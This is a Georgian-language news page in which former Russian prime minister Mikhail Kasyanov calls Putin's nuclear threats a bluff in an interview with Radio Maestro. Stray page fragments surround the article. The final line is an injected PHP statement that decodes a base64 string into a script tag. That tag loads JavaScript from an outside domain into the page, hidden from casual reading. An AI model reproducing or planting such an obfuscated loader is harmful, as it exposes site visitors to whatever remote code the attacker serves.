celsiusi
ავერსი შნაიდერი
რუსეთის ყოფილ პრემიერ–მინისტრს, მიხაილ კასიანოვს მიაჩნია, რომ ბირთვული იარაღის შესახებ პუტინის მუქარა არარეალურია – ამის შესახებ მან  „რადიო მაესტროსთან“ ინტერვიუში განაცხადა.
 
მისივე თქმით, პუტინს სხვა მენტალიტეტი გააჩნია და ის რა თქმა უნდა, თვითმკვლელი არ არის.
 
"მე მიმაჩნია, რომ ეს არარეალურია, ვინაიდან, პუტინი სამხედრო გენერალი არ არის, რომელიც მზად არის სამშობლოსთვის ომის ფრონტზე მოკვდეს. ის არის კეგებეს ოფიცერი, კეკებეში მუშაობის სამი პრინციპია: მოსყიდვა, შანტაჟი და პროვოკაცია. იქ ბრძოლის ველზე არავინ ეცემა. მათი სტილია პროვოცირება და მალევე გაქცევა, რომ არაფერზე პასუხისმგებელი არ იყვნენ. შესაბამისად, მას სხვა მენტალიტეტი გააჩნია და ის რა თქმა უნდა, თვითმკვლელი არ არის. ბირთვულ ომს მის თავშიც კი  გამოვრიცხავ, პოლიტიკურად ის ვერ არის, მისი ჯანმრთელობის მდგომარეობა ნორმალურია, მაგრამ პოლიტიკურად ვერ არის. თუ კარგად გააცნობიერებს რა მოჰყვება ბირთვულ ომს დარწმუნებული ვარ ის ამაზე არასოდეს წავა. ეს უბრალოდ, ბლეფია, ბირთვული იარაღით მუქარა მეტყველებს ადამიანის აგრესიულობაზე და საერთოდ არ სცემს პატივს საერთაშორისო ნორმებს, კანონებს და შეთანხმებებს, რომლებიც ევროპული უსაფრთხოების სისტემის შექმნის დროს ჩამოყალიბდა" – აღნიშნა რუსეთის ყოფილმა პრემიერმა. 
 
ინტერვიუს სრულად ნახვა შესაძლებელია აქ. 
650
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");